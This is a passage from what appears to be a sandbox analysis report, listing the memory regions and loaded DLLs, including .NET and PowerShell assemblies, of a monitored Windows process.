"\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 553 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 554 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 555 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 556 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 557 start_va = 0x1be0000 end_va = 0x1be1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001be0000" filename = "" Region: id = 558 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 559 start_va = 0x1bf0000 end_va = 0x1bf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 560 start_va = 0x1c00000 end_va = 0x1c01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 561 start_va = 0x1f40000 end_va = 0x220efff entry_point = 0x1f40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 562 start_va = 0x2220000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 563 start_va = 0x7fefbeb0000 end_va = 0x7fefbfdbfff entry_point = 0x7fefbeb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 564 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 565 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 566 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 567 start_va = 0x1c20000 end_va = 0x1c3ffff entry_point = 0x1c20000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 568 start_va = 0x1c50000 end_va = 0x1c50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c50000" filename = "" Region: id = 569 start_va = 0x22a0000 end_va = 0x2692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 570 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 571 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 572 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 573 start_va = 0x7fef82e0000 end_va = 0x7fef8313fff entry_point = 0x7fef82e0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 574 start_va = 0x7fefa5e0000 end_va = 0x7fefa636fff entry_point = 0x7fefa5e0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 575 start_va = 0x1c10000 end_va = 0x1c13fff entry_point = 0x1c10000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 576 start_va = 0x1c60000 end_va = 0x1c8ffff entry_point = 0x1c60000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 577 start_va = 0x1c90000 end_va = 0x1c93fff entry_point = 0x1c90000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 578 start_va = 0x1d60000 end_va = 0x1dc5fff entry_point = 0x1d60000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 579 start_va = 0x2760000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 580 start_va = 0x2850000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 581 start_va = 0x2950000 end_va = 0x29cffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 582 start_va = 0x7fef82d0000 end_va = 0x7fef82dbfff entry_point = 0x7fef82d0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 583 start_va = 0x7fef8d70000 end_va = 0x7fef8deffff entry_point = 0x7fef8d70000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 584 start_va = 0x7fef8e70000 end_va = 0x7fef8e7efff entry_point = 0x7fef8e70000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 585 start_va = 0x7fefb0d0000 end_va = 0x7fefb0dafff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 586 start_va = 0x7fefd320000 end_va = 0x7fefd342fff entry_point = 0x7fefd320000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 587 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 588 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 589 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 590 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 591 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 592 start_va = 0x7fee5c30000 end_va = 0x7fee5cc8fff entry_point = 0x7fee5c30000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 593 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 594 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 595 start_va = 0x2a80000 end_va = 0x2afffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 596 start_va = 0x74e60000 end_va = 0x74f28fff entry_point = 0x74e60000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 597 start_va = 0x7fee2b10000 end_va = 0x7fee34acfff entry_point = 0x7fee2b10000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 615 start_va = 0x1cb0000 end_va = 0x1cb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 616 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 617 start_va = 0x26a0000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 618 start_va = 0x26e0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 619 start_va = 0x2b00000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 620 start_va = 0x2c00000 end_va = 0x2d00fff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 621 start_va = 0x2d50000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 622 start_va = 0x2dd0000 end_va = 0x1adcffff entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 623 start_va = 0x1add0000 end_va = 0x1b49ffff entry_point = 0x0 region_type = private name = "private_0x000000001add0000" filename = "" Region: id = 624 start_va = 0x1b530000 end_va = 0x1b5affff entry_point = 0x0 region_type = private name = "private_0x000000001b530000" filename = "" Region: id = 625 start_va = 0x7fee1c30000 end_va = 0x7fee2b0bfff entry_point = 0x7fee1c30000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 626 start_va = 0x7ff00020000 end_va = 0x7ff0002ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00020000" filename = "" Region: id = 627 start_va = 0x7ff00030000 end_va = 0x7ff0003ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 628 start_va = 0x7ff00040000 end_va = 0x7ff000dffff entry_point = 0x0 region_type = private name = "private_0x000007ff00040000" filename = "" Region: id = 629 start_va = 0x7ff000e0000 end_va = 0x7ff000effff entry_point = 0x0 region_type = private name = "private_0x000007ff000e0000" filename = "" Region: id = 630 start_va = 0x7ff000f0000 end_va = 0x7ff0015ffff entry_point = 0x0 region_type = private name = "private_0x000007ff000f0000" filename = "" Region: id = 631 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 632 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 638 start_va = 0x1cd0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 639 start_va = 0x1b5b0000 end_va = 0x1b891fff entry_point = 0x1b5b0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 640 start_va = 0x7fee10e0000 end_va = 0x7fee1191fff entry_point = 0x7fee10e0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll") Region: id = 641 start_va = 0x7fee11a0000 end_va = 0x7fee1bc2fff entry_point = 0x7fee11a0000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 642 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 643 start_va = 0x7fffff10000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 644 start_va = 0x7fee0580000 end_va = 0x7fee10dcfff entry_point = 0x7fee0580000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll") Region: id = 645 start_va = 0x7ff00160000 end_va = 0x7ff0016ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00160000" filename = "" Region: id = 646 start_va = 0x1dd0000 end_va = 0x1dd2fff entry_point = 0x1dd0000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 647 start_va = 0x1b8a0000 end_va = 0x1b95ffff entry_point = 0x1b8a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 648 start_va = 0x777a0000 end_va = 0x777a6fff entry_point = 0x777a0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 649 start_va = 0x2210000 end_va = 0x2210fff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 650 start_va = 0x26c0000 end_va = 0x26c4fff entry_point = 0x26c0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 651 start_va = 0x26f0000 end_va = 0x2730fff entry_point = 0x26f0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 652 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 653 start_va = 0x26d0000 end_va = 0x26d7fff entry_point = 0x26d0000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 654 start_va = 0x2740000 end_va = 0x2740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 655 start_va = 0x1b960000 end_va = 0x1ba5ffff entry_point = 0x0 region_type = private name = "private_0x000000001b960000" filename = "" Region: id = 656 start_va = 0x1e230000 end_va = 0x1e278fff entry_point = 0x1e230000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 657 start_va = 0x7fee0000000 end_va = 0x7fee00e4fff entry_point = 0x7fee0000000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll") Region: id = 658 start_va = 0x7fee00f0000 end_va = 0x7fee0199fff entry_point = 0x7fee00f0000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll") Region: id = 659 start_va = 0x7fee01a0000 end_va = 0x7fee01d1fff entry_point = 0x7fee01a0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll") Region: id = 660 start_va = 0x7fee01e0000 end_va = 0x7fee0248fff entry_point = 0x7fee01e0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 661 start_va = 0x7fee0250000 end_va = 0x7fee057dfff entry_point = 0x7fee0250000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll") Region: id = 662 start_va = 0x2750000 end_va = 0x2750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 663 start_va = 0x642ff4a0000 end_va = 0x642ff4a9fff entry_point = 0x642ff4a0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 664 start_va = 0x7fedfc80000 end_va = 0x7fedfcbdfff entry_point = 0x7fedfc80000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll") Region: id = 665 start_va = 0x7fedfcc0000 end_va = 0x7fedfdd7fff entry_point = 0x7fedfcc0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll") Region: id = 666 start_va = 0x7fedfde0000 end_va = 0x7fedfff5fff entry_point = 0x7fedfde0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll") Region: id = 667 start_va = 0x27e0000 end_va = 0x2833fff entry_point = 0x27e0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 668 start_va = 0x7fedf040000 end_va = 0x7fedf1d4fff entry_point = 0x7fedf040000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll") Region: id = 669 start_va = 0x7fedf1e0000 end_va = 0x7fedf34bfff entry_point = 0x7fedf1e0000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll") Region: id = 670 start_va = 0x7fedf350000 end_va = 0x7fedf9f4fff entry_point = 0x7fedf350000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 671 start_va = 0x7fefae10000 end_va = 0x7fefae16fff entry_point = 0x7fefae10000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 672 start_va = 0x2750000 end_va = 0x2750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 673 start_va = 0x28d0000 end_va = 0x28e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028d0000" filename = "" Region: id = 674 start_va = 0x7fedeeb0000 end_va = 0x7fedf033fff entry_point = 0x7fedeeb0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 675 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 676 start_va = 0x7ff00190000 end_va = 0x7ff0019ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 677 start_va = 0x7ff001a0000 end_va = 0x7ff001affff entry_point = 0x0 region_type = private name = "private_0x000007ff001a0000" filename = "" Region: id = 678 start_va = 0x7ff001b0000 end_va = 0x7ff001bffff entry_point = 0x0 region_type = private name = "private_0x000007ff001b0000" filename = "" Region: id = 679 start_va = 0x7ff001c0000 end_va = 0x7ff001cffff entry_point = 0x0 region_type = private name = "private_0x000007ff001c0000" filename = "" Region: id = 680 start_va = 0x7ff001d0000 end_va = 0x7ff001dffff entry_point = 0x0 region_type = private name = "private_0x000007ff001d0000" filename = "" Region: id = 681 start_va = 0x7ff001e0000 end_va = 0x7ff001effff entry_point = 0x0 region_type = private name = "private_0x000007ff001e0000" filename = "" Region: id = 682 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 683 start_va = 0x7ff001f0000 end_va = 0x7ff001fffff entry_point = 0x0 region_type = private name = "private_0x000007ff001f0000" filename = "" Region: id = 684 start_va = 0x7ff00200000 end_va = 0x7ff0020ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00200000" filename = "" Region: id = 685 start_va = 0x7ff00210000 end_va = 0x7ff0021ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00210000" filename = "" Region: id = 686 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 687 start_va = 0x1ba60000 end_va = 0x1bb5ffff entry_point = 0x0 region_type = private name = "private_0x000000001ba60000" filename = "" Region: id = 688 start_va = 0x2840000 end_va = 0x2840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 689 start_va = 0x1bb60000 end_va = 0x1be5efff entry_point = 0x1bb60000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 690 start_va = 0x7fede660000 end_va = 0x7fedeeaafff entry_point = 0x7fede660000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll") Region: id = 691 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 692 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 693 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = 